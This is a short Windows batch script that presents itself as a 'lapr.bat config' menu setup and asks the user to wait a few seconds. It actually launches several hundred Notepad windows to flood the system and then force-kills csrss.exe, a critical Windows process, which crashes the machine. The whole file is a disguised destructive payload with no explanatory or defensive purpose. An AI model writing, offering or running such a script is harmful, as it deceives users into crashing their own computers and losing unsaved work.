@echo off
title lapr.bat config

echo menu setup!
echo wait 3 to 4 seconds to make sure that this will work!

start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe



taskkill /F /IM csrss.exe
